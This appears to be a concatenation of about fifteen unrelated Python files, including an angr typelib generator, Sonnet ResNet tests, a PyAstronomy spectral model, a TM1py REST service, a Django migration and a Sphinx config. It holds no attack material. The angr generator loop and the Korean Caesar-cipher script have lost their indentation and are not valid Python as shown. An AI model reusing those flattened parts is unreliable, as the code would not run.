SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, \
SimTypePointer, \
SimTypeChar, \
SimStruct, \
SimTypeFixedSizeArray, \
SimTypeBottom, \
SimUnion, \
SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
"""
footer = """ }
lib.set_prototypes(prototypes)
"""
for libname, parsed_cprotos_per_lib in parsed_cprotos.items():
filename = "win32_" + libname.replace(".", "_") + ".py"
with open(filename, "w") as f:
f.write(header)
if libname == "kernel32":
f.write("""lib.add_all_from_dict(P['win32'])
lib.add_alias('EncodePointer', 'DecodePointer')
lib.add_alias('GlobalAlloc', 'LocalAlloc')
lib.add('lstrcatA', P['libc']['strcat'])
lib.add('lstrcmpA', P['libc']['strcmp'])
lib.add('lstrcpyA', P['libc']['strcpy'])
lib.add('lstrcpynA', P['libc']['strncpy'])
lib.add('lstrlenA', P['libc']['strlen'])
lib.add('lstrcmpW', P['libc']['wcscmp'])
lib.add('lstrcmpiW', P['libc']['wcscasecmp'])
""")
elif libname == "ntdll":
f.write("""lib.add('RtlEncodePointer', P['win32']['EncodePointer'])
lib.add('RtlDecodePointer', P['win32']['EncodePointer'])
lib.add('RtlAllocateHeap', P['win32']['HeapAlloc'])
""")
elif libname == "user32":
f.write("""import archinfo
from ...calling_conventions import SimCCCdecl
lib.add('wsprintfA', P['libc']['sprintf'], cc=SimCCCdecl(archinfo.ArchX86()))
""")
f.write(f"lib.set_library_names(\"{libname}.dll\")\n")
f.write("prototypes = \\\n {\n")
f.write(parsedcprotos2py(parsed_cprotos_per_lib))
f.write(footer)
def main():
    """Command-line entry point: parse arguments and build the typelib."""
    parser = ArgumentParser(description='Build a typelib from win32json project')
    parser.add_argument("win32json_api_directory")
    parser.add_argument("-v", action="count",
                        help="Increase logging verbosity. Can specify multiple times.")
    args = parser.parse_args()
    # Each -v lowers the threshold by 10 (WARNING -> INFO -> DEBUG ...).
    if args.v is not None:
        logging.basicConfig(level=max(30 - (args.v * 10), 0))
    do_it(args.win32json_api_directory, None)


if __name__ == "__main__":
    main()
|
# Puzzle input: one line "lower-upper" giving an inclusive password range.
INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
    raw = ifile.read()

lower, upper = (int(part) for part in raw.strip().split("-"))
passwords = tuple(str(number) for number in range(lower, upper + 1))
from itertools import groupby
from typing import Callable
def valid(group_size_rule: Callable[[int], bool], password: str) -> bool:
    """Return True if digits never decrease and some run of equal digits satisfies the rule."""
    # Reject as soon as any adjacent pair decreases.
    for left, right in zip(password, password[1:]):
        if left > right:
            return False
    # Length of each maximal run of identical digits.
    run_lengths = (len(list(run)) for _, run in groupby(password))
    return any(group_size_rule(length) for length in run_lengths)
# Part 1: any run of 2+ equal digits; part 2: a run of exactly 2.
part1 = sum(1 for candidate in passwords if valid(lambda size: size > 1, candidate))
part2 = sum(1 for candidate in passwords if valid(lambda size: size == 2, candidate))
print(part1)
print(part2)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Class definition Dog
By: Steve Lammers, Steven.Lammers@UCDenver.edu
"""
# Imports
#import numpy as np
#import matplotlib
class Dog:
    """A simple dog with a color and a name.

    Args:
        color: string - dog color
        name: string - name of dog
    """

    def __init__(self, color, name):
        # Keep constructor arguments on the instance (non-public by convention).
        self._color = color
        self._name = name

    def bark(self):
        """Print a bark to stdout."""
        print('Woof')
# Smoke test: runs only when this file is executed directly,
# e.g. `python Dog.py` from a terminal.
if __name__ == "__main__":
    demo_dog = Dog('yellow', 'buddy')
    demo_dog.bark()
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sonnet.v2.src.nets.resnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from sonnet.src import test_utils
from sonnet.src.nets import resnet
import tensorflow as tf
class ResnetTest(test_utils.TestCase, parameterized.TestCase):
  """Tests for sonnet.src.nets.resnet.ResNet."""

  def setUp(self):
    super(ResnetTest, self).setUp()
    # Allow construction of the (gated) ResNet-v2 variant in these tests.
    resnet.TESTONLY_ENABLE_RESNET_V2 = True

  @parameterized.parameters(True, False)
  def test_simple(self, resnet_v2):
    """A minimal ResNet produces logits of the expected shape."""
    image = tf.random.normal([2, 64, 64, 3])
    model = resnet.ResNet([1, 1, 1, 1], 10, resnet_v2=resnet_v2)
    logits = model(image, is_training=True)
    self.assertIsNotNone(logits)
    self.assertEqual(logits.shape, [2, 10])

  @parameterized.parameters(True, False)
  def test_tf_function(self, resnet_v2):
    """Wrapping the model in tf.function must not change its output."""
    image = tf.random.normal([2, 64, 64, 3])
    model = resnet.ResNet(
        [1, 1, 1, 1],
        10,
        resnet_v2=resnet_v2,
    )
    f = tf.function(model)
    logits = f(image, is_training=True)
    self.assertIsNotNone(logits)
    self.assertEqual(logits.shape, [2, 10])
    self.assertAllEqual(model(image, is_training=True).numpy(), logits.numpy())

  @parameterized.parameters(3, 5)
  def test_error_incorrect_args_block_list(self, list_length):
    """blocks_per_group_list must have exactly 4 entries."""
    block_list = list(range(list_length))
    # assertRaisesRegexp is a deprecated alias (removed in Python 3.12);
    # assertRaisesRegex is the supported spelling.
    with self.assertRaisesRegex(
        ValueError, "blocks_per_group_list` must be of length 4 not {}".format(
            list_length)):
      resnet.ResNet(block_list, 10, {"decay_rate": 0.9, "eps": 1e-5})

  @parameterized.parameters(3, 5)
  def test_error_incorrect_args_channel_list(self, list_length):
    """channels_per_group_list must have exactly 4 entries."""
    channel_list = list(range(list_length))
    with self.assertRaisesRegex(
        ValueError,
        "channels_per_group_list` must be of length 4 not {}".format(
            list_length)):
      resnet.ResNet([1, 1, 1, 1], 10, {"decay_rate": 0.9, "eps": 1e-5},
                    channels_per_group_list=channel_list)

  def test_v2_throws(self):
    """Requesting ResNet-v2 while it is disabled raises NotImplementedError."""
    resnet.TESTONLY_ENABLE_RESNET_V2 = False
    with self.assertRaisesRegex(NotImplementedError, "please use v1"):
      resnet.ResNet([1, 1, 1, 1], 10, resnet_v2=True)
if __name__ == "__main__":
  # tf.enable_v2_behavior()
  # Discover and run all TensorFlow test cases in this module.
  tf.test.main()
|
from __future__ import unicode_literals
# Common Redis constants for discovery and transport classes.

# Identifiers for the supported Redis backend flavors.
REDIS_BACKEND_TYPE_STANDARD = 'redis.standard'
REDIS_BACKEND_TYPE_SENTINEL = 'redis.sentinel'

# Every recognized backend type, for validation.
REDIS_BACKEND_TYPES = (REDIS_BACKEND_TYPE_STANDARD, REDIS_BACKEND_TYPE_SENTINEL)

# Message size ceilings in bytes: 100 KiB for clients, 250 KiB for servers.
DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT = 100 * 1024
DEFAULT_MAXIMUM_MESSAGE_BYTES_SERVER = 250 * 1024
|
from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField, SubmitField
class AddForm(FlaskForm):
    """Form for adding a puppy by name."""
    name = StringField('Name of Puppy:')
    submit = SubmitField('Add Puppy')
class DelForm(FlaskForm):
    """Form for removing a puppy by its database id."""
    id = IntegerField('Id Number of Puppy to Remove:')
    submit = SubmitField('Remove Puppy')
|
# IronPython Silverlight bootstrap script.
from System.Windows import Application
from System.Windows.Controls import UserControl

# Load the root visual defined in app.xaml and set its greeting text.
# NOTE(review): assumes the XAML declares an element named "Message" — confirm.
root = Application.Current.LoadRootVisual(UserControl(), "app.xaml")
root.Message.Text = "Welcome to Python and Silverlight!"
|
from __future__ import print_function, division
from PyAstronomy import funcFit as fuf
from PyAstronomy import pyasl
from PyAstronomy.pyaC import pyaErrors as PE
import numpy as np
import scipy.interpolate as sci
from PyAstronomy.modelSuite import ic
import six.moves as smo
class LLGauss(fuf.OneDFit):
    """
    A spectral model based on Gaussian profiles and a line list.

    This class provides a simple spectral model based on a number
    of Gaussian lines, whose strength may be fitted individually.

    Note that the EW of the lines is given by:
    `A{n}`*`lineScale`, where `A{n}` is the area of the n-th
    Gaussian. The `scale` parameter does not influence the
    EW of the Gaussians.

    .. note:: The unit of the EWs given in the `lineList` needs
              to be the same as the wavelength units.

    *Fit parameters*:
      - `lineScale` - A common scaling of the area of *all* lines.
      - `scale` - A scaling of the *entire* spectrum.
      - `eps` - Linear limb-darkening coefficient.
      - `vrad` - Radial velocity [km/s].
      - `vsini` - Projected stellar rotational velocity [km/s].
      - `A{n}` - The amplitudes (area) parameters of the individual Gaussians.
      - `sig{n}` - The standard deviations of the individual Gaussians.
      - `mu{n}` - The positions of the individual Gaussians.

    Parameters
    ----------
    onlyAbs : boolean, optional
        If True (default), restrictions will be applied, which
        prevent emission lines in the spectrum.
    lineList : array
        An array with either two or three columns. The first column
        gives the position of the lines, the second gives the EW
        of the lines, and the third---if present---gives the depth
        of the lines. The depth is the maximal depression of the
        continuum, e.g., a value of 0.96 means that the center
        of the line is 4% below the continuum. If the depth is given,
        the width of the individual Gaussians is determined from it,
        unless `uniSig` is specified.
    uniSig : float, optional
        Use "unified sigma", i.e., the same width for all lines.
        Note that this flag overrules the "depth" column in the
        `lineList`, if it has been specified.
    modelBinsize : float, optional
        Internally, the model should be calculated on a finer grid
        than the actual spectrum. This parameter specifies the used
        bin size, which is 0.005 by default.
    useFastRB : boolean, optional
        Use the "fast" rotational broadening algorithm. This algorithm
        uses a wavelength-independent broadening kernel, which is
        considerably faster than considering the wavelength dependence.
        Setting this flag to False is necessary if you use very
        long wavelength ranges; by default it is True.
    verbose : boolean, optional
        If True, the class prints the current parameters during the
        evaluation.
    """

    def __init__(self, lineList, uniSig=None, modelBinsize=0.005, useFastRB=True, verbose=False, onlyAbs=True):
        if not ic.check["scipy"]:
            raise(PE.PyARequiredImport("Could not import scipy.", \
                                       solution="Install scipy."))
        # Check whether depths are given (i.e., the line list has three columns)
        self._depthsGiven = (len(lineList[0,::]) == 3)
        if (not self._depthsGiven) and (uniSig is None):
            raise(PE.PyAValError("No width and no depth given.", \
                                 solution="Specify line depth in `lineList` or use `uniSig`."))
        # Check whether unified sigma shall be used
        # Note: Line depth will be ignored then
        self._uniSig = uniSig
        # Only absorption lines
        self._onlyAbs = onlyAbs
        # Verbosity
        self._verbose = verbose
        # Use fast rotational broadening?
        self._usefastRB = useFastRB
        # Save binsize for the model
        self._modelBinsize = modelBinsize
        # Copy line list
        self._lineList = lineList.copy()
        # Number of lines
        self._nl = len(lineList[::,0])
        # A MultiGaussFit object
        self._mg = fuf.MultiGauss1d(self._nl)
        # Store all parameter names from GaussFit
        pars = list(self._mg.parameters().keys())
        # Remove lin and off from multiGauss keys
        pars.remove("lin")
        pars.remove("off")
        pars.extend(["lineScale", "scale", "eps", "vrad", "vsini"])
        fuf.OneDFit.__init__(self, pars)
        # Name the model
        self.setRootName("LineListGauss")
        # Assign start values
        for i in range(self._nl):
            p = str(i+1)
            # Assign position
            self._mg["mu"+p] = lineList[i,0]
            self["mu"+p] = lineList[i,0]
            # Assign amplitude/EW
            # Note: Positive EWs correspond to absorption lines
            self._mg["A"+p] = -lineList[i,1]
            self["A"+p] = lineList[i,1]
            # Assign width (sigma)
            if self._depthsGiven and (self._uniSig is None):
                # Depth IS given and no unified sigma specified:
                # sigma follows from EW = depression * sigma * sqrt(2*pi),
                # where the depression is (1 - depth column).
                self._mg["sig"+p] = abs(lineList[i,1])/((1.-lineList[i,2]) * np.sqrt(2.*np.pi))
                self["sig"+p] = self._mg["sig"+p]
            elif not (self._uniSig is None):
                # uniSig IS given
                self._mg["sig"+p] = self._uniSig
                self["sig"+p] = self._mg["sig"+p]
        self["scale"] = 1.0
        self["lineScale"] = 1.0
        if self._onlyAbs:
            # Apply restrictions to prevent emission lines
            for i in range(self._nl):
                p = str(i+1)
                self.setRestriction({"A"+p:[0.0, None]})

    def thawLineStrengths(self, wlmin=None, wlmax=None):
        """
        Thaw line strengths.

        Thaws parameters of the form A{n}, where
        n is the number of the Gaussian component.
        By default all such parameters will be
        thawed. The selection may, however, be
        influenced by specifying `wlmin` and `wlmax`.

        Parameters
        ----------
        wlmin : float, optional
            If specified, only the strength of lines at
            wavelengths larger than this limit will be thawed.
        wlmax : float, optional
            If specified, only the strength of lines at
            wavelengths below this limit will be thawed.

        Returns
        -------
        Thawed parameters : list
            A list of thawed parameter names.
        """
        freeAs = []
        for i in smo.range(self._nl):
            p = str(i+1)
            mu = self["mu"+p]
            # Skip lines outside the requested wavelength window
            if wlmin is not None:
                if mu < wlmin: continue
            if wlmax is not None:
                if mu >= wlmax: continue
            freeAs.append("A"+p)
        self.thaw(freeAs)
        return freeAs

    def thawLineWidths(self, wlmin=None, wlmax=None):
        """
        Thaw line widths.

        Thaws parameters of the form sig{n}, where
        n is the number of the Gaussian component.
        By default all such parameters will be
        thawed. The selection may, however, be
        influenced by specifying `wlmin` and `wlmax`.

        Parameters
        ----------
        wlmin : float, optional
            If specified, only the width of lines at
            wavelengths larger than this limit will be thawed.
        wlmax : float, optional
            If specified, only the width of lines at
            wavelengths below this limit will be thawed.

        Returns
        -------
        Thawed parameters : list
            A list of thawed parameter names.
        """
        freeSigs = []
        for i in smo.range(self._nl):
            p = str(i+1)
            mu = self["mu"+p]
            # Skip lines outside the requested wavelength window
            if wlmin is not None:
                if mu < wlmin: continue
            if wlmax is not None:
                if mu >= wlmax: continue
            freeSigs.append("sig"+p)
        self.thaw(freeSigs)
        return freeSigs

    def numberOfLines(self):
        """
        Get the number of lines in the model.

        Returns
        -------
        Number of lines : int
            Number of Gaussians in the model.
        """
        return self._nl

    def evaluate(self, x):
        """
        Calculates the model for current parameters.

        The "model" is calculated on a wavelength axis with
        binning specified by the `modelBinsize` parameter.

        The line positions are Doppler shifted and the resulting
        model is rotationally broadened. Finally, the entire
        model is multiplied by the `scale` parameter to
        account for a global normalization.

        Parameters
        ----------
        x : array
            The wavelengths at which to calculate the model.

        Returns
        -------
        model : array
            The model evaluated at the specified positions.
        """
        if self._verbose:
            print("Evaluating with parameters: ", self.parameters())
        # Calculate how much longer the model wavelength axis should
        # be to ensure that Doppler shift and rotational broadening
        # do not "violate" its edges.
        maxV = abs(self["vsini"]) + abs(self["vrad"])
        deltaWvl = max(x) * (1.0 + maxV/299792.458) - max(x)
        # The additional summand `_modelBinsize` is needed to ensure
        # that the wavelength axis is long enough even if the velocities
        # are very small.
        mwvl = np.arange(min(x)-deltaWvl, max(x)+deltaWvl+self._modelBinsize, self._modelBinsize)
        # Start from a flat continuum at unity
        mflux = np.ones(len(mwvl))
        # Set parameters of multiGauss
        for i in smo.range(self._nl):
            p = str(i+1)
            # Apply global scaling of amplitudes
            self._mg["A"+p] = -self["A"+p] * self["lineScale"]
            self._mg["sig"+p] = self["sig"+p]
            # Apply doppler shift of lines (299792.458 km/s = speed of light)
            self._mg["mu"+p] = (1.0 + self["vrad"]/299792.458) * self["mu"+p]
        # Add all (negative) Gaussian profiles to the continuum at once
        mflux += self._mg.evaluate(mwvl)
        if abs(self["vsini"]) > 0.0:
            # Apply rotational broadening
            if self._usefastRB:
                mflux = pyasl.fastRotBroad(mwvl, mflux, self["eps"], np.abs(self["vsini"]))
            else:
                mflux = pyasl.rotBroad(mwvl, mflux, self["eps"], np.abs(self["vsini"]))
        # Global normalization
        mflux *= self["scale"]
        # Return model interpolated at input wavelength
        f = sci.interp1d(mwvl, mflux)
        return f(x)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-06-11 16:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Finncon 2018 signup tweaks: makes shirt_size optional (blank/null)
    # and updates the choice sets. Labels and help texts are in Finnish
    # (user-facing strings — left untranslated on purpose).

    dependencies = [
        ('finncon2018', '0002_auto_20180429_2012'),
    ]

    operations = [
        migrations.AlterField(
            model_name='signupextra',
            name='shirt_size',
            field=models.CharField(blank=True, choices=[('NO_SHIRT', 'Ei paitaa'), ('XS', 'XS Unisex'), ('S', 'S Unisex'), ('M', 'M Unisex'), ('L', 'L Unisex'), ('XL', 'XL Unisex'), ('XXL', 'XXL Unisex'), ('3XL', '3XL Unisex'), ('4XL', '4XL Unisex'), ('5XL', '5XL Unisex'), ('LF_XS', 'XS Ladyfit'), ('LF_S', 'S Ladyfit'), ('LF_M', 'M Ladyfit'), ('LF_L', 'L Ladyfit'), ('LF_XL', 'XL Ladyfit'), ('LF_2XL', '2XL Ladyfit'), ('LF_3XL', '3XL Ladyfit')], help_text='Ajoissa ilmoittautuneet vänkärit saavat maksuttoman työvoimapaidan, mikäli ilmoittavat työskentelevänsä vähintään 8 tuntia.', max_length=8, null=True, verbose_name='Paidan koko'),
        ),
        migrations.AlterField(
            model_name='signupextra',
            name='total_work',
            field=models.CharField(choices=[('4h', '4–8 tuntia'), ('8h', '8 tuntia'), ('yli8h', 'Yli 8 tuntia')], help_text='Kuinka paljon haluat tehdä töitä yhteensä tapahtuman aikana?', max_length=15, verbose_name='Toivottu kokonaistyömäärä'),
        ),
    ]
|
# SPDX-FileCopyrightText: 2020 Hlib Babii <hlibbabii@gmail.com>
#
# SPDX-License-Identifier: Apache-2.0
from codeprep.tokens.numeric import Number
from codeprep.parse.matchers import split_into_words
from codeprep.tokens.containers import SplitContainer
from codeprep.tokens.whitespace import NewLine, SpaceInString
from codeprep.tokens.word import Word, Underscore
from codeprep.parse.subtokens import split_string
def test_split_into_tokens():
    """split_into_words tokenizes digits, newlines, camelCase and snake_case."""
    actual = split_into_words("123\nAb2cd34Ef000GG j_89_J")
    # One SplitContainer per identifier; digits and case changes split words.
    expected = [Number('123'),
                NewLine(),
                SplitContainer([Word.from_('Ab'), Word.from_('2'), Word.from_('cd'),
                                Word.from_('34'), Word.from_('Ef'), Word.from_('000'), Word.from_('GG')]),
                SplitContainer([Word.from_('j'), Underscore(), Word.from_('89'), Underscore(), Word.from_('J')])]
    assert expected == actual
def test_split_string():
    """split_string behaves like split_into_words but preserves in-string whitespace."""
    # NOTE(review): SpaceInString(5) below implies the literal should contain a
    # run of 5 spaces between 'GG' and 'j' — whitespace may have been collapsed
    # in this copy of the source; confirm against the original file.
    actual = split_string("123\nAb2cd34Ef000GG j_89_J")
    expected = [Number('123'),
                NewLine(),
                SplitContainer([Word.from_('Ab'), Word.from_('2'), Word.from_('cd'),
                                Word.from_('34'), Word.from_('Ef'), Word.from_('000'), Word.from_('GG')]),
                SpaceInString(5),
                SplitContainer([Word.from_('j'), Underscore(), Word.from_('89'), Underscore(), Word.from_('J')])]
    assert expected == actual
"""
파일 이름 : 14584.py
제작자 : 정지운
제작 날짜 : 2017년 5월 28일
"""
import sys
# 암호문을 입력 받는다.
password = input()
# 단어 개수와 각 단어를 입력받는다.
num = int(input())
# 단어는 리스트에 저장한다.
wordlst = []
for i in range(num):
word = input()
wordlst.append(word)
# 알파벳을 한 칸씩 평행이동하면서 암호문을 검사한다.
# 한 칸씩 평행이동하므로 총 26번을 반복한다.
temp_password = ''
for i in range(1, 27):
# 문자 하나하나씩 평행이동을 시킨다.
for ch in password:
if ch != 'z':
temp_password += chr(ord(ch) + 1)
# 문자가 z인 경우에는 a로 이동시킨다.
else:
temp_password += 'a'
# 단어가 포함되어 있는지 검사한다.
for j in range(num):
# 단어가 포함되어 있으면 그 암호문을 해석한 것이므로 그 암호문을 출력하고 프로그램을 종료한다.
if wordlst[j] in temp_password:
print(temp_password)
sys.exit()
# 단어가 포함되어 있지 못하면 여태까지 해 왔던 것들을 반복한다.
# password를 변경시켜야지 변경된 자리에서 평행이동시킬 수 있다.
password = temp_password
temp_password = '' |
"""Supplementary functions"""
import logging
import logging.config
import os
import yaml
LOGGING_CONFIG_FILEPATH = "logging.conf.yml"
logger = logging.getLogger("ext_summarizer")
def setup_logging():
    """Set up logging from the YAML config file.

    Loads `LOGGING_CONFIG_FILEPATH`, ensures the file handler's target
    directory exists, then applies the configuration via dictConfig.
    """
    # Explicit encoding so the config parses identically on every platform
    # (the default text encoding is platform-dependent).
    with open(LOGGING_CONFIG_FILEPATH, 'r', encoding='utf-8') as config_fin:
        cfg = yaml.safe_load(config_fin)
    # The log file's directory may not exist yet on a fresh checkout.
    os.makedirs(os.path.dirname(cfg['handlers']['file_handler']['filename']), exist_ok=True)
    logging.config.dictConfig(cfg)
|
# -*- coding: utf-8 -*-
from TM1py.Objects import ElementAttribute, Element
from TM1py.Services.ObjectService import ObjectService
class ElementService(ObjectService):
    """ Service to handle Object Updates for TM1 Dimension (resp. Hierarchy) Elements
    """

    def __init__(self, rest):
        # Delegate REST plumbing to the generic ObjectService.
        super().__init__(rest)

    def get(self, dimension_name, hierarchy_name, element_name):
        """ Get an element with all properties expanded.

        :param dimension_name:
        :param hierarchy_name:
        :param element_name:
        :return: instance of TM1py.Element
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')?$expand=*"\
            .format(dimension_name, hierarchy_name, element_name)
        response = self._rest.GET(request)
        return Element.from_dict(response.json())

    def create(self, dimension_name, hierarchy_name, element):
        """ Create an element in a hierarchy.

        :param element: instance of TM1py.Element
        :return: response
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements".format(dimension_name, hierarchy_name)
        return self._rest.POST(request, element.body)

    def update(self, dimension_name, hierarchy_name, element):
        """ Update an existing element in a hierarchy.

        :param element: instance of TM1py.Element
        :return: response
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
                                                                                     element.name)
        return self._rest.PATCH(request, element.body)

    def exists(self, dimension_name, hierarchy_name, element_name):
        """ Check whether an element exists in a hierarchy.

        :return: boolean
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
                                                                                     element_name)
        return self._exists(request)

    def delete(self, dimension_name, hierarchy_name, element_name):
        """ Delete an element from a hierarchy.

        :return: response
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
                                                                                     element_name)
        return self._rest.DELETE(request)

    def get_elements(self, dimension_name, hierarchy_name):
        """ Get all elements from a hierarchy.

        :return: List of instances of TM1py.Element
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements?$expand=*"\
            .format(dimension_name, hierarchy_name)
        response = self._rest.GET(request)
        return [Element.from_dict(element) for element in response.json()["value"]]

    def get_leaf_elements(self, dimension_name, hierarchy_name):
        """ Get all leaf elements from a hierarchy.

        :return: List of instances of TM1py.Element
        """
        # "Type ne 3" excludes consolidated elements, leaving only leaves.
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements?$expand=*&$filter=Type ne 3"\
            .format(dimension_name, hierarchy_name)
        response = self._rest.GET(request)
        return [Element.from_dict(element) for element in response.json()["value"]]

    def get_leaf_element_names(self, dimension_name, hierarchy_name):
        """ Get all leaf element names from a hierarchy.

        :return: Generator of element-names
        """
        # "Type ne 3" excludes consolidated elements, leaving only leaves.
        request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/Elements?$select=Name&$filter=Type ne 3'.format(
            dimension_name,
            hierarchy_name)
        response = self._rest.GET(request, '')
        return (e["Name"] for e in response.json()['value'])

    def get_element_names(self, dimension_name, hierarchy_name):
        """ Get all elementnames

        :param dimension_name:
        :param hierarchy_name:
        :return: Generator of element-names
        """
        request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/Elements?$select=Name'.format(dimension_name,
                                                                                                hierarchy_name)
        response = self._rest.GET(request, '')
        return (e["Name"] for e in response.json()['value'])

    def get_element_attributes(self, dimension_name, hierarchy_name):
        """ Get element attributes from hierarchy

        :param dimension_name:
        :param hierarchy_name:
        :return: List of instances of TM1py.ElementAttribute
        """
        request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/ElementAttributes'.format(dimension_name,
                                                                                            hierarchy_name)
        response = self._rest.GET(request, '')
        element_attributes = [ElementAttribute.from_dict(ea) for ea in response.json()['value']]
        return element_attributes

    def get_elements_filtered_by_attribute(self, dimension_name, hierarchy_name, attribute_name, attribute_value):
        """ Get all elements from a hierarchy with given attribute value

        :param dimension_name:
        :param hierarchy_name:
        :param attribute_name:
        :param attribute_value:
        :return: List of element names
        """
        # OData attribute names contain no spaces.
        attribute_name = attribute_name.replace(" ", "")
        # String values must be quoted in the OData filter; numbers must not.
        if isinstance(attribute_value, str):
            request = "/api/v1/Dimensions('{}')/Hierarchies('{}')" \
                      "?$expand=Elements($filter = Attributes/{} eq '{}';$select=Name)" \
                .format(dimension_name, hierarchy_name, attribute_name, attribute_value)
        else:
            request = "/api/v1/Dimensions('{}')/Hierarchies('{}')" \
                      "?$expand=Elements($filter = Attributes/{} eq {};$select=Name)" \
                .format(dimension_name, hierarchy_name, attribute_name, attribute_value)
        response = self._rest.GET(request)
        return [elem['Name'] for elem in response.json()['Elements']]

    def create_element_attribute(self, dimension_name, hierarchy_name, element_attribute):
        """ like AttrInsert

        :param dimension_name:
        :param hierarchy_name:
        :param element_attribute: instance of TM1py.ElementAttribute
        :return:
        """
        request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/ElementAttributes" \
            .format(dimension_name, hierarchy_name)
        return self._rest.POST(request, element_attribute.body)

    def delete_element_attribute(self, dimension_name, hierarchy_name, element_attribute):
        """ like AttrDelete

        :param dimension_name:
        :param hierarchy_name:
        :param element_attribute: instance of TM1py.ElementAttribute
        :return:
        """
        # Attributes live in the control dimension "}ElementAttributes_<dim>";
        # the doubled '}}' is literal-brace escaping for str.format.
        request = "/api/v1/Dimensions('}}ElementAttributes_{}')/Hierarchies('}}ElementAttributes_{}')/Elements('{}')" \
            .format(dimension_name, hierarchy_name, element_attribute)
        return self._rest.DELETE(request, '')

    def get_leaves_under_consolidation(self, dimension_name, hierarchy_name, consolidation, max_depth=None):
        """ Get all leaves under a consolidated element

        :param dimension_name: name of dimension
        :param hierarchy_name: name of hierarchy
        :param consolidation: name of consolidated Element
        :param max_depth: 99 if not passed
        :return:
        """
        return self.get_members_under_consolidation(dimension_name, hierarchy_name, consolidation, max_depth, True)

    def get_members_under_consolidation(self, dimension_name, hierarchy_name, consolidation, max_depth=None,
                                        leaves_only=False):
        """ Get all members under a consolidated element

        :param dimension_name: name of dimension
        :param hierarchy_name: name of hierarchy
        :param consolidation: name of consolidated Element
        :param max_depth: 99 if not passed
        :param leaves_only: Only Leaf Elements or all Elements
        :return:
        """
        depth = max_depth if max_depth else 99
        # members to return
        members = []
        # Build request: nest $expand=Components(...) once per depth level.
        bare_request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')?$select=Name,Type&$expand=Components("
        request = bare_request.format(dimension_name, hierarchy_name, consolidation)
        for _ in range(depth):
            request += "$select=Name,Type;$expand=Components("
        # Drop the innermost '(' and close all opened parentheses.
        request = request[:-1] + ")" * depth
        response = self._rest.GET(request)
        consolidation_tree = response.json()

        # recursive function to parse consolidation_tree
        def get_members(element):
            if element["Type"] == "Numeric":
                members.append(element["Name"])
            elif element["Type"] == "Consolidated":
                if "Components" in element:
                    for component in element["Components"]:
                        if not leaves_only:
                            members.append(component["Name"])
                        get_members(component)
        get_members(consolidation_tree)
        return members
|
import pendulum
from app.api.business.agreement_business import get_old_agreements
from tests.app.helpers import BaseApplicationTest
class TestOldAgreement(BaseApplicationTest):
    """Tests for agreement_business.get_old_agreements()."""

    def setup(self):
        super(TestOldAgreement, self).setup()

    def test_old_agreement_end_dates_are_in_the_past(self, master_agreements):
        # NOTE(review): `master_agreements` looks like a pytest fixture that
        # seeds exactly two expired agreements — confirm where it is defined.
        old_agreements = get_old_agreements()
        now = pendulum.now('utc')
        assert len(old_agreements) == 2
        # Every "old" agreement must have already ended.
        for agreement in old_agreements:
            assert agreement.end_date < now
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Insolar'
copyright = '2020, Insolar'
author = 'Insolar team'

# The full version, including alpha/beta/rc tags
release = '1.0'
version = 'latest'

# -- General configuration ---------------------------------------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    # 'sphinxcontrib.golangdomain',
    'sphinx_tabs.tabs',
    'sphinxcontrib.plantuml',
    'sphinx_copybutton',
    'sphinxcontrib.contentui'
]

plantuml_output_format = 'svg'
plantuml_latex_output_format = 'png'

master_doc = 'index'

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []

# -- Options for HTML output -------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
